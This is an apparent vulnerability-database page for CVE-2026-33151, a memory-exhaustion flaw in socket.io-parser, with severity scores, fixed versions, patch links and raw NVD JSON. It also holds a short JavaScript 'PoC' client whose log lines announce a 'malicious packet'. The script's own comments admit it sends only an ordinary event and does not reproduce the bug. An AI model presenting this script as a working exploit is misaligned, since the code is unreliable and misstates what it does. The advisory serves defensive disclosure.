Security Vulnerability Report
CVE-2026-33151 CVSS 7.5 HIGH

CVE-2026-33151

Published: 2026-03-20 21:17:16
Last Modified: 2026-04-14 18:22:20

Description

Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:* - VULNERABLE
Socket.IO < 3.3.5
Socket.IO < 3.4.4
Socket.IO < 4.2.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// Conceptual client for CVE-2026-33151 (socket.io-parser attachment buffering).
// It opens a Socket.IO connection, emits one event, and logs what happened.
// NOTE(review): this only emits an ordinary 'message' event whose payload is a
// plain object. As the original author notes, a real trigger would require the
// raw Socket.IO packet format that declares binary attachments; this script does
// not construct that, so on its own it does not reproduce the issue. The reliable
// defensive check is the server's socket.io-parser version — the advisory lists
// 3.3.5, 3.4.4 and 4.2.6 as the fixed releases.
const connect = require('socket.io-client');

// Endpoint of the server under (authorized) test.
const serverUrl = 'http://localhost:3000';
const client = connect(serverUrl);

// Event payload. `num` is just a property of this object; nothing here turns
// it into an attachment count on the wire.
const payload = {
  type: 'binary',
  data: 'exploit',
  num: 1000000,
};

// Runs once the handshake completes: send the event and tell the operator to
// inspect server memory.
function handleConnect() {
  console.log('[+] Connected to server. Sending malicious packet...');
  client.emit('message', payload);
  console.log('[+] Malicious packet sent. Check server memory usage.');
}

// Logs when the server (or network) drops the connection.
function handleDisconnect() {
  console.log('[-] Disconnected from server.');
}

client.on('connect', handleConnect);
client.on('disconnect', handleDisconnect);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33151", "sourceIdentifier": "[email protected]", "published": "2026-03-20T21:17:15.573", "lastModified": "2026-04-14T18:22:20.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. Prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can make the server wait for a large number of binary attachments and buffer them, which can be exploited to make the server run out of memory. This issue has been patched in versions 3.3.5, 3.4.4, and 4.2.6."}, {"lang": "es", "value": "Socket.IO es un framework de comunicación de código abierto, en tiempo real, bidireccional y basado en eventos. Antes de las versiones 3.3.5, 3.4.4 y 4.2.6, un paquete de Socket.IO especialmente diseñado puede hacer que el servidor espere un gran número de adjuntos binarios y los almacene en búfer, lo cual puede ser explotado para agotar la memoria del servidor. 
Este problema ha sido parcheado en las versiones 3.3.5, 3.4.4 y 4.2.6."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", 
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-754"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.3.5", "matchCriteriaId": "BBB43B3E-5E3E-4EDA-8748-E9DF4939767E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "3.4.0", "versionEndExcluding": "3.4.4", "matchCriteriaId": "3CF6E321-6910-4470-975B-E9D4C9ABF4E2"}, {"vulnerable": true, "criteria": "cpe:2.3:a:socket:socket.io-parser:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.2.6", "matchCriteriaId": "6E19A7BD-B307-4907-B0DA-C7C826E682A3"}]}]}], "references": [{"url": "https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}